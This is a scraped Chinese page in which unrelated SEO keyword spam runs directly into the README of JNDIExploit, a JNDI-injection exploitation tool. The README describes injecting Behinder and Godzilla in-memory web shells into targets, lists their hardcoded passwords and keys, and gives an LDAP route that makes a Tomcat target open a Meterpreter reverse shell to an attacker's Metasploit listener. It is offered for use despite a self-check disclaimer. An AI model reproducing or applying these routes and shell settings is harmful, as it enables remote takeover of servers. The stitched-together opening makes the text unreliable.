建设网站计划ppt模板,请人制作一个app多少钱,延边网站建设公司,我做网站编辑写文章很慢怎么办JNDIExploit 一款用于 JNDI注入 利用的工具#xff0c;大量参考/引用了 Rogue JNDI 项目的代码#xff0c;支持直接植入内存shell#xff0c;并集成了常见的bypass 高版本JDK的方式#xff0c;适用于与自动化工具配合使用。 对 feihong-cs 大佬的项目https://github.com/fe… JNDIExploit 一款用于 JNDI注入 利用的工具大量参考/引用了 Rogue JNDI 项目的代码支持直接植入内存shell并集成了常见的bypass 高版本JDK的方式适用于与自动化工具配合使用。 对 feihong-cs 大佬的项目https://github.com/feihong-cs/JNDIExploit 进行了一些改进,tomcatBypass现可直接上线msf。见添加内容2 免责声明 该工具仅用于安全自查检测 由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任。 本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许不得善自使用本工具进行任何攻击活动不得以任何方式将其用于商业目的。 添加内容 添加内容是为了支持SpringBootExploit工具是定制版的服务端。 启动方式java -jar JNDIExploit-1.3-SNAPSHOT.jar 默认绑定127.0.0.1 LDAP 绑定 1389 HTTP Server 绑定3456根目录下BehinderFilter.class是内存马 /ateam 密码是ateamnbdata/behinder3.jar 是为了支持SnakYaml RCE添加HTTPServer处理更多的请求为了更好支持SpringBootExploit工具将文件放在data目录下通过HTTPServer可以访问文件内容如同python的HTTPServer 添加内容2 新增哥斯拉内存马 支持引用类远程加载方式打入Basic路由支持本地工厂类方式打入 TomcatBypass路由 哥斯拉客户端配置 密码pass1024
密钥key
有效载荷JavaDynamicPayload
加密器JAVA_AES_BASE64修复之前版本中的一些问题冰蝎内存马现已直接可用冰蝎客户端直连 新增msf上线支持 支持tomcatBypass路由直接上线msf 使用msf的java/meterpreter/reverse_tcp开启监听ldap://127.0.0.1:1389/TomcatBypass/Meterpreter/[msfip]/[msfport]TODO 本地ClassPath反序列化漏洞利用方式支持自定义内存马密码内存马模块改一下 使用说明 使用 java -jar JNDIExploit.jar -h 查看参数说明其中 --ip 参数为必选参数